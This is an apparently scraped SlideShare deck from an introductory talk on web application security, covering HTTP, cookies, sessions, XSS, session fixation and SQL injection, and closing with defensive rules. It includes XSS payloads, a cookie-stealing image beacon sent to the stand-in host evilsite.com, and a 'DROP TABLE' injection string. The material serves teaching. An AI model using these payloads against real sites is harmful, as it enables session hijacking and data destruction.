Fundamentals of webapplication security &   security testing         t0m <bobtfish@bobtfish.net>
Who are you?• Open source hacker• github.com/bobtfish/• Perl guy (sorry) - 160 CPAN modules• Core team for Catalyst and Pla...
This talk
This talk• ~ 1h long
This talk• ~ 1h long• Covers the very basics • HTTP • Host headers • Cookies
This talk• ~ 1h long• Covers the very basics • HTTP • Host headers • Cookies• Tools • Paros / Charles / etc
• Sessions • Session fixation attacks
• Sessions • Session fixation attacks• XSS (General HTML injection) • How to test • How to exploit
• Sessions • Session fixation attacks• XSS (General HTML injection) • How to test • How to exploit• SQL Injection
• NOT comprehensive.
• NOT comprehensive.• JUST the basics.
You don’t need to be a     programmer
You don’t need to be a     programmer• I’m going to assume you know a bit about  the internet
You don’t need to be a     programmer• I’m going to assume you know a bit about  the internet• And that you’ve at least se...
Workshop on Sunday
Workshop on Sunday• No schedule - made by you!
Workshop on Sunday• No schedule - made by you!
Workshop on Sunday• No schedule - made by you!• Deeper and more practical discussion
HTML
HTML• The markup format that web pages are  written in.
HTML• The markup format that web pages are  written in.• I’m just assuming you all know the basics
HTML• The markup format that web pages are  written in.• I’m just assuming you all know the basics• Sorry if you don’t ;P
HTML• The markup format that web pages are  written in.• I’m just assuming you all know the basics• Sorry if you don’t ;P•...
HTTP - The very basics
HTTP - The very basics• HTTP goes over TCP/IP
HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered
HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port
HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response
HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response • URL
HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response • URL • Method
Request / Response
Request / Response• You ask the sever for some data
Request / Response• You ask the sever for some data• It does some work
Request / Response• You ask the sever for some data• It does some work• And serves you a response, possibly  including dat...
Dynamic
Dynamic• The response could just be a file on disc
Dynamic• The response could just be a file on disc• HTML, image, etc
Dynamic• The response could just be a file on disc• HTML, image, etc• We’re interested about when it’s dynamic -  i.e. when...
GET / HTTP/1.0HTTP/1.1 200 OKDate: Wed, 29 Aug 2012 21:47:59 GMTServer: ApacheLast-Modified: Wed, 27 Jul 2011 10:18:21 GMTE...
GET / HTTP/1.0
GET / HTTP/1.0• Simplest possible HTTP request
GET / HTTP/1.0• Simplest possible HTTP request• Method - GET
GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /
GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /• HTTP version
GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /• HTTP version• Followed by rnrn
GET / HTTP/1.0• Headers optional after first line
GET / HTTP/1.0• Headers optional after first line• Body can be supplied after rnrn if you  specify a non-zero content length
GET / HTTP/1.0• Headers optional after first line• Body can be supplied after rnrn if you  specify a non-zero content lengt...
HTTP/1.1 200 OK
HTTP/1.1 200 OK• Always the first line of the response
HTTP/1.1 200 OK• Always the first line of the response• We asked for 1.0, got 1.1 back
HTTP/1.1 200 OK• Always the first line of the response• We asked for 1.0, got 1.1 back• 200 is response code. • 2xx - Succe...
Date: Wed, 29 Aug 2012    21:47:59 GMT• Other headers now follow. All in format:  Key:Value• Date: RFC822• Optional
Server: Apache• Sometimes has exact versions and  extensions• Easy to lie• Optional
Last-Modified: Wed, 27Jul 2011 10:18:21 GMT• Used for caching (maybe)• Optional
ETag:"1c888b-0-4a90a5e239540"• Used for caching (maybe)• Optional
Accept-Ranges: bytes• ‘Partial GET’• Ask for a byte range in the file• Get back just that part• Used by ‘download managers’...
Content-Length: 0• Mandatory!• Specifies how long the body is• Can be 0
Vary: Accept-Encoding• For caching • What header fields mean a different    version of the document • E.g. language detecti...
Connection: close• Server is going to drop the connection, you  have to reconnect.• Possible to keep the connection persis...
Content-Type:           text/html• How the browser should interpret the  body• Mandatory for documents with a body
HTTP 1.1• Adds a mandatory Host header to the  request• Allows > 1 web site per IP address
GET / HTTP/1.1Host: goatse.co.ukHTTP/1.1 200 OKDate: Wed, 29 Aug 2012 21:49:49 GMTServer: ApacheLast-Modified: Wed, 27 Jul ...
Sending data to the      server
Sending data to the         server• Encode it into the URI
Sending data to the         server• Encode it into the URI • /with/a/path
Sending data to the         server• Encode it into the URI • /with/a/path • /?or=parameters
POST
POST• Used to send data back to the server
POST• Used to send data back to the server• Content-Type: application/x-www-form-  urlencoded
POST• Used to send data back to the server• Content-Type: application/x-www-form-  urlencoded• Has a Content-Length, and a...
POST• Used to send data back to the server• Content-Type: application/x-www-form-  urlencoded• Has a Content-Length, and a...
POSTPOST / HTTP/1.1Host: www.example.comContent-Length: 17Content-Type: application/x-www-form-urlencodedfoo=bar&foo2=quux
Forms• HTML forms are the primary means of  getting user data to the server• Data is in the body, not the URL, so they  do...
Ok - basics covered!
Ok - basics covered!• Phew!
Ok - basics covered!• Phew!• Lets put all this stuff together - into an  application.
Ok - basics covered!• Phew!• Lets put all this stuff together - into an  application.• And then hack it.
Simplest possible app<html>Data is: <form><input name=”foo” value=”<?php echo$_GET[foo] ?>” /><input type=”submit” /></for...
http://server/test.php?        foo=foo
FAIL
FAIL• Did you spot the epic fail?
FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”
FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”• Golden rule - never ever accept input  without valida...
FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”• Golden rule - never ever accept input  without valida...
WHY?
WHY?• You can send: ?foo="><blink>Foo<  %2Fblink>
WHY?• You can send: ?foo="><blink>Foo<  %2Fblink>• Comes out as: <input name="foo"  value=""><blink>Foo</blink>
WHY?• You can send: ?foo="><blink>Foo<  %2Fblink>• Comes out as: <input name="foo"  value=""><blink>Foo</blink>• You just ...
Javascript
Javascript• Is where it all goes really wrong
Javascript• Is where it all goes really wrong• Can change or rewrite the page
Javascript• Is where it all goes really wrong• Can change or rewrite the page• Can be inserted inline into HTML
Javascript• Is where it all goes really wrong• Can change or rewrite the page• Can be inserted inline into HTML• foo="><sc...
Bye bye page!
Less simple example
Less simple example• Add data storage
Less simple example• Add data storage• E.g. Message board multiple people can  look at
Less simple example• Add data storage• E.g. Message board multiple people can  look at• Doom!
Less simple example• Add data storage• E.g. Message board multiple people can  look at• Doom!• Or at least vandalism
More theory
More theory• Sorry, but it’s necessary
More theory• Sorry, but it’s necessary• People’s credit card numbers are behind  login pages
More theory• Sorry, but it’s necessary• People’s credit card numbers are behind  login pages• So we have to understand how...
Cookies
Cookies
CookiesNot like that!
Cookies
Cookies Or that!
Cookies
CookiesDefinitely not!
Set-Cookie
Set-Cookie• A request header
Set-Cookie• A request header• Set-Cookie: foo=bar
Set-Cookie• A request header• Set-Cookie: foo=bar• Set-Cookie: foo=bar; expires=Thu, 01-  Jan-1970 00:01:40 GMT; path=/;  ...
Affects subsequent       requestsBrowser returns “Cookie: foo=bar” header
Sessions
Sessions• Hand each visitor a random session token,  identify them in future
Sessions• Hand each visitor a random session token,  identify them in future• Login credentials only transmitted once
Sessions• Hand each visitor a random session token,  identify them in future• Login credentials only transmitted once• All...
Sessions
Sessions• Shared secret
Sessions• Shared secret• If it stops being a secret, you lose!
Stealing cookies
Stealing cookies• Can get cookie data from javascript
Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability,  we can run code that gr...
Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability,  we can run code that gr...
Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability,  we can run code that gr...
<img src=”http://evilsite.com/?data=here” />
Lets step through that
Lets step through that• Message board site gives users a cookie  when they login
Lets step through that• Message board site gives users a cookie  when they login• Cookie contains session token
Lets step through that• Message board site gives users a cookie  when they login• Cookie contains session token• You post ...
Lets step through that• Message board site gives users a cookie  when they login• Cookie contains session token• You post ...
Lets step through that
Lets step through that• Other user’s browsers execute your  javascript
Lets step through that• Other user’s browsers execute your  javascript• It grabs their cookie
Lets step through that• Other user’s browsers execute your  javascript• It grabs their cookie• Adds to their page: <img sr...
Lets step through that• Other user’s browsers execute your  javascript• It grabs their cookie• Adds to their page: <img sr...
Lets step through that
Lets step through that• evilsite.com records the cookie
Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent  gif
Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent  gif• I can now post ...
Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent  gif• I can now post ...
Did you notice the    handwave?
Did you notice the       handwave?• I need a way to get your cookie into my  browser
Did you notice the       handwave?• I need a way to get your cookie into my  browser• This is easy to do - find a proxy lib...
Did you notice the       handwave?• I need a way to get your cookie into my  browser• This is easy to do - find a proxy lib...
Session fixation
Session fixation• Quite a common bug
Session fixation• Quite a common bug• Allows you to specify the session ID you’d  like
Session fixation• Quite a common bug• Allows you to specify the session ID you’d  like• Useful for abusing XSS elsewhere
Session fixation• Quite a common bug• Allows you to specify the session ID you’d  like• Useful for abusing XSS elsewhere• A...
Session fixation• Quite a common bug• Allows you to specify the session ID you’d  like• Useful for abusing XSS elsewhere• A...
Tools
Tools - Paros• http://www.parosproxy.org/
Tools - Charles• OSX only• Costs money (free trial)
Tools - Firebug
Tools - Firebug• Firefox addon
Tools - Firebug• Firefox addon• Allows you to debug javascript and HTML
Tools - Firebug• Firefox addon• Allows you to debug javascript and HTML• Useful for getting exploits working in  combinati...
SQL Injection
SQL Injection• SQL used by databases, for data storage
SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows
SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows• SELECT id, name FROM users WHERE  n...
SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows• SELECT id, name FROM users WHERE  n...
SQL Injection
SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
First query.No password needed!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘exa...
Second query.     Ruins your day!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘e...
Comment - ignored!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
Golden Rules
Golden Rules• Never ever accept input without validating  it’s sane.
Golden Rules• Never ever accept input without validating  it’s sane.• Never ever output anything that may have  come from ...
Thanks for listening!• Hope that wasn’t too boring :)• Feel free to come chat to me.• Or mail me: bobtfish@bobtfish.net• Or ...
Webapp security testing
Webapp security testing
Webapp security testing
Webapp security testing
Webapp security testing
Upcoming SlideShare
Loading in...5
×

Webapp security testing

1,072

Published on

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,072
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
9
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • TCP (Reliable, ordered). Host, port number.\nRequest and response. GET/HEAD/POST\nHeaders\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Add a mandatory &amp;#x2018;Host&amp;#x2019; header\nWe have run out of IP addresses - this means you can have multiple sites per IP\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • Set-Cookie\nCookie\nDomain / Path / Secure\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Webapp security testing

    1. 1. Fundamentals of webapplication security & security testing t0m <bobtfish@bobtfish.net>
    2. 2. Who are you?• Open source hacker• github.com/bobtfish/• Perl guy (sorry) - 160 CPAN modules• Core team for Catalyst and Plack web frameworks.• Ex professional security tester / R&D
    3. 3. This talk
    4. 4. This talk• ~ 1h long
    5. 5. This talk• ~ 1h long• Covers the very basics • HTTP • Host headers • Cookies
    6. 6. This talk• ~ 1h long• Covers the very basics • HTTP • Host headers • Cookies• Tools • Paros / Charles / etc
    7. 7. • Sessions • Session fixation attacks
    8. 8. • Sessions • Session fixation attacks• XSS (General HTML injection) • How to test • How to exploit
    9. 9. • Sessions • Session fixation attacks• XSS (General HTML injection) • How to test • How to exploit• SQL Injection
    10. 10. • NOT comprehensive.
    11. 11. • NOT comprehensive.• JUST the basics.
    12. 12. You don’t need to be a programmer
    13. 13. You don’t need to be a programmer• I’m going to assume you know a bit about the internet
    14. 14. You don’t need to be a programmer• I’m going to assume you know a bit about the internet• And that you’ve at least seen HTML before.
    15. 15. Workshop on Sunday
    16. 16. Workshop on Sunday• No schedule - made by you!
    17. 17. Workshop on Sunday• No schedule - made by you!
    18. 18. Workshop on Sunday• No schedule - made by you!• Deeper and more practical discussion
    19. 19. HTML
    20. 20. HTML• The markup format that web pages are written in.
    21. 21. HTML• The markup format that web pages are written in.• I’m just assuming you all know the basics
    22. 22. HTML• The markup format that web pages are written in.• I’m just assuming you all know the basics• Sorry if you don’t ;P
    23. 23. HTML• The markup format that web pages are written in.• I’m just assuming you all know the basics• Sorry if you don’t ;P• Can almost always be sloppy - browser tries to do the right thing.
    24. 24. HTTP - The very basics
    25. 25. HTTP - The very basics• HTTP goes over TCP/IP
    26. 26. HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered
    27. 27. HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port
    28. 28. HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response
    29. 29. HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response • URL
    30. 30. HTTP - The very basics• HTTP goes over TCP/IP • Reliable, ordered • Host and port• Request / Response • URL • Method
    31. 31. Request / Response
    32. 32. Request / Response• You ask the sever for some data
    33. 33. Request / Response• You ask the sever for some data• It does some work
    34. 34. Request / Response• You ask the sever for some data• It does some work• And serves you a response, possibly including data, called a ‘body’
    35. 35. Dynamic
    36. 36. Dynamic• The response could just be a file on disc
    37. 37. Dynamic• The response could just be a file on disc• HTML, image, etc
    38. 38. Dynamic• The response could just be a file on disc• HTML, image, etc• We’re interested about when it’s dynamic - i.e. when your input changes the HTML output.
    39. 39. GET / HTTP/1.0HTTP/1.1 200 OKDate: Wed, 29 Aug 2012 21:47:59 GMTServer: ApacheLast-Modified: Wed, 27 Jul 2011 10:18:21 GMTETag: "1c888b-0-4a90a5e239540"Accept-Ranges: bytesContent-Length: 0Vary: Accept-EncodingConnection: closeContent-Type: text/htmlX-Pad: avoid browser bug
    40. 40. GET / HTTP/1.0
    41. 41. GET / HTTP/1.0• Simplest possible HTTP request
    42. 42. GET / HTTP/1.0• Simplest possible HTTP request• Method - GET
    43. 43. GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /
    44. 44. GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /• HTTP version
    45. 45. GET / HTTP/1.0• Simplest possible HTTP request• Method - GET• URL /• HTTP version• Followed by rnrn
    46. 46. GET / HTTP/1.0• Headers optional after first line
    47. 47. GET / HTTP/1.0• Headers optional after first line• Body can be supplied after rnrn if you specify a non-zero content length
    48. 48. GET / HTTP/1.0• Headers optional after first line• Body can be supplied after rnrn if you specify a non-zero content length• There will be examples of this later
    49. 49. HTTP/1.1 200 OK
    50. 50. HTTP/1.1 200 OK• Always the first line of the response
    51. 51. HTTP/1.1 200 OK• Always the first line of the response• We asked for 1.0, got 1.1 back
    52. 52. HTTP/1.1 200 OK• Always the first line of the response• We asked for 1.0, got 1.1 back• 200 is response code. • 2xx - Success • 3xx - Redirect • 4xx - User error • 5xx - Server error
    53. 53. Date: Wed, 29 Aug 2012 21:47:59 GMT• Other headers now follow. All in format: Key:Value• Date: RFC822• Optional
    54. 54. Server: Apache• Sometimes has exact versions and extensions• Easy to lie• Optional
    55. 55. Last-Modified: Wed, 27Jul 2011 10:18:21 GMT• Used for caching (maybe)• Optional
    56. 56. ETag:"1c888b-0-4a90a5e239540"• Used for caching (maybe)• Optional
    57. 57. Accept-Ranges: bytes• ‘Partial GET’• Ask for a byte range in the file• Get back just that part• Used by ‘download managers’ to resume• Optional
    58. 58. Content-Length: 0• Mandatory!• Specifies how long the body is• Can be 0
    59. 59. Vary: Accept-Encoding• For caching • What header fields mean a different version of the document • E.g. language detection• Optional
    60. 60. Connection: close• Server is going to drop the connection, you have to reconnect.• Possible to keep the connection persistent, if you ask for it
    61. 61. Content-Type: text/html• How the browser should interpret the body• Mandatory for documents with a body
    62. 62. HTTP 1.1• Adds a mandatory Host header to the request• Allows > 1 web site per IP address
    63. 63. GET / HTTP/1.1Host: goatse.co.ukHTTP/1.1 200 OKDate: Wed, 29 Aug 2012 21:49:49 GMTServer: ApacheLast-Modified: Wed, 27 Jul 2011 10:18:21 GMTETag: "1c888b-0-4a90a5e239540"Accept-Ranges: bytesContent-Length: 0Vary: Accept-EncodingConnection: closeContent-Type: text/htmlX-Pad: avoid browser bug
    64. 64. Sending data to the server
    65. 65. Sending data to the server• Encode it into the URI
    66. 66. Sending data to the server• Encode it into the URI • /with/a/path
    67. 67. Sending data to the server• Encode it into the URI • /with/a/path • /?or=parameters
    68. 68. POST
    69. 69. POST• Used to send data back to the server
    70. 70. POST• Used to send data back to the server• Content-Type: application/x-www-form- urlencoded
    71. 71. POST• Used to send data back to the server• Content-Type: application/x-www-form- urlencoded• Has a Content-Length, and a body
    72. 72. POST• Used to send data back to the server• Content-Type: application/x-www-form- urlencoded• Has a Content-Length, and a body• Data is encoded like this: foo=bar&foo2=baz
    73. 73. POSTPOST / HTTP/1.1Host: www.example.comContent-Length: 17Content-Type: application/x-www-form-urlencodedfoo=bar&foo2=quux
    74. 74. Forms• HTML forms are the primary means of getting user data to the server• Data is in the body, not the URL, so they don’t get saved in bookmarks• <form> tag• <input> tag
    75. 75. Ok - basics covered!
    76. 76. Ok - basics covered!• Phew!
    77. 77. Ok - basics covered!• Phew!• Lets put all this stuff together - into an application.
    78. 78. Ok - basics covered!• Phew!• Lets put all this stuff together - into an application.• And then hack it.
    79. 79. Simplest possible app<html>Data is: <form><input name=”foo” value=”<?php echo$_GET[foo] ?>” /><input type=”submit” /></form></html>
    80. 80. http://server/test.php? foo=foo
    81. 81. FAIL
    82. 82. FAIL• Did you spot the epic fail?
    83. 83. FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”
    84. 84. FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”• Golden rule - never ever accept input without validating it’s sane
    85. 85. FAIL• Did you spot the epic fail?• value=”<?php echo $_GET[foo] ?>”• Golden rule - never ever accept input without validating it’s sane• Golden rule - never ever output anything that may have come from external input without encoding it
    86. 86. WHY?
    87. 87. WHY?• You can send: ?foo="><blink>Foo< %2Fblink>
    88. 88. WHY?• You can send: ?foo="><blink>Foo< %2Fblink>• Comes out as: <input name="foo" value=""><blink>Foo</blink>
    89. 89. WHY?• You can send: ?foo="><blink>Foo< %2Fblink>• Comes out as: <input name="foo" value=""><blink>Foo</blink>• You just added HTML to the document - fail!
    90. 90. Javascript
    91. 91. Javascript• Is where it all goes really wrong
    92. 92. Javascript• Is where it all goes really wrong• Can change or rewrite the page
    93. 93. Javascript• Is where it all goes really wrong• Can change or rewrite the page• Can be inserted inline into HTML
    94. 94. Javascript• Is where it all goes really wrong• Can change or rewrite the page• Can be inserted inline into HTML• foo="><script>document.removeChild(doc ument.getElementsByTagName(html)[0])< %2Fscript>
    95. 95. Bye bye page!
    96. 96. Less simple example
    97. 97. Less simple example• Add data storage
    98. 98. Less simple example• Add data storage• E.g. Message board multiple people can look at
    99. 99. Less simple example• Add data storage• E.g. Message board multiple people can look at• Doom!
    100. 100. Less simple example• Add data storage• E.g. Message board multiple people can look at• Doom!• Or at least vandalism
    101. 101. More theory
    102. 102. More theory• Sorry, but it’s necessary
    103. 103. More theory• Sorry, but it’s necessary• People’s credit card numbers are behind login pages
    104. 104. More theory• Sorry, but it’s necessary• People’s credit card numbers are behind login pages• So we have to understand how logins work to steal them
    105. 105. Cookies
    106. 106. Cookies
    107. 107. CookiesNot like that!
    108. 108. Cookies
    109. 109. Cookies Or that!
    110. 110. Cookies
    111. 111. CookiesDefinitely not!
    112. 112. Set-Cookie
    113. 113. Set-Cookie• A request header
    114. 114. Set-Cookie• A request header• Set-Cookie: foo=bar
    115. 115. Set-Cookie• A request header• Set-Cookie: foo=bar• Set-Cookie: foo=bar; expires=Thu, 01- Jan-1970 00:01:40 GMT; path=/; domain=example.net
    116. 116. Affects subsequent requestsBrowser returns “Cookie: foo=bar” header
    117. 117. Sessions
    118. 118. Sessions• Hand each visitor a random session token, identify them in future
    119. 119. Sessions• Hand each visitor a random session token, identify them in future• Login credentials only transmitted once
    120. 120. Sessions• Hand each visitor a random session token, identify them in future• Login credentials only transmitted once• Allows login to be SSL (and rest of site not)
    121. 121. Sessions
    122. 122. Sessions• Shared secret
    123. 123. Sessions• Shared secret• If it stops being a secret, you lose!
    124. 124. Stealing cookies
    125. 125. Stealing cookies• Can get cookie data from javascript
    126. 126. Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability, we can run code that grabs the cookie
    127. 127. Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability, we can run code that grabs the cookie• “Same origin policy” - cannot transmit elsewhere.
    128. 128. Stealing cookies• Can get cookie data from javascript• If we find an HTML injection vulnerability, we can run code that grabs the cookie• “Same origin policy” - cannot transmit elsewhere.• Cheat! Add content to the document.
    129. 129. <img src=”http://evilsite.com/?data=here” />
    130. 130. Lets step through that
    131. 131. Lets step through that• Message board site gives users a cookie when they login
    132. 132. Lets step through that• Message board site gives users a cookie when they login• Cookie contains session token
    133. 133. Lets step through that• Message board site gives users a cookie when they login• Cookie contains session token• You post an evil message containing Javascript
    134. 134. Lets step through that• Message board site gives users a cookie when they login• Cookie contains session token• You post an evil message containing Javascript• Other users view your message
    135. 135. Lets step through that
    136. 136. Lets step through that• Other user’s browsers execute your javascript
    137. 137. Lets step through that• Other user’s browsers execute your javascript• It grabs their cookie
    138. 138. Lets step through that• Other user’s browsers execute your javascript• It grabs their cookie• Adds to their page: <img src=”http:// evilsite.com/?data=cookie_data” />
    139. 139. Lets step through that• Other user’s browsers execute your javascript• It grabs their cookie• Adds to their page: <img src=”http:// evilsite.com/?data=cookie_data” />• Users browser tries to download image
    140. 140. Lets step through that
    141. 141. Lets step through that• evilsite.com records the cookie
    142. 142. Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent gif
    143. 143. Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent gif• I can now post messages as any (still logged in) user who viewed my message.
    144. 144. Lets step through that• evilsite.com records the cookie• evilsite.com serves a 1px x 1px transparent gif• I can now post messages as any (still logged in) user who viewed my message.• Having the users’s cookie allows you to become the user
    145. 145. Did you notice the handwave?
    146. 146. Did you notice the handwave?• I need a way to get your cookie into my browser
    147. 147. Did you notice the handwave?• I need a way to get your cookie into my browser• This is easy to do - find a proxy library in your favourite programming language ;P
    148. 148. Did you notice the handwave?• I need a way to get your cookie into my browser• This is easy to do - find a proxy library in your favourite programming language ;P• Or tools you can just download
    149. 149. Session fixation
    150. 150. Session fixation• Quite a common bug
    151. 151. Session fixation• Quite a common bug• Allows you to specify the session ID you’d like
    152. 152. Session fixation• Quite a common bug• Allows you to specify the session ID you’d like• Useful for abusing XSS elsewhere
    153. 153. Session fixation• Quite a common bug• Allows you to specify the session ID you’d like• Useful for abusing XSS elsewhere• Also good to steal logins without needing XSS.
    154. 154. Session fixation• Quite a common bug• Allows you to specify the session ID you’d like• Useful for abusing XSS elsewhere• Also good to steal logins without needing XSS.• /?sessionID=XXXXXXXXXXX
    155. 155. Tools
    156. 156. Tools - Paros• http://www.parosproxy.org/
    157. 157. Tools - Charles• OSX only• Costs money (free trial)
    158. 158. Tools - Firebug
    159. 159. Tools - Firebug• Firefox addon
    160. 160. Tools - Firebug• Firefox addon• Allows you to debug javascript and HTML
    161. 161. Tools - Firebug• Firefox addon• Allows you to debug javascript and HTML• Useful for getting exploits working in combination with another tool
    162. 162. SQL Injection
    163. 163. SQL Injection• SQL used by databases, for data storage
    164. 164. SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows
    165. 165. SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows• SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’;
    166. 166. SQL Injection• SQL used by databases, for data storage• Tables, with columns and rows• SELECT id, name FROM users WHERE name = ‘fred’ AND password = ‘example’;• SAME ISSUE AS BEFORE
    167. 167. SQL Injection
    168. 168. SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
    169. 169. First query.No password needed!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
    170. 170. Second query. Ruins your day!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
    171. 171. Comment - ignored!SELECT id, name FROM users WHERE name= ‘Robert); DROP TABLE Students;--’ ANDpassword = ‘example’;
    172. 172. Golden Rules
    173. 173. Golden Rules• Never ever accept input without validating it’s sane.
    174. 174. Golden Rules• Never ever accept input without validating it’s sane.• Never ever output anything that may have come from external input without encoding it.
    175. 175. Thanks for listening!• Hope that wasn’t too boring :)• Feel free to come chat to me.• Or mail me: bobtfish@bobtfish.net• Or grab me on irc: t0m on Freenode• More in-depth workshop on Sunday!
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×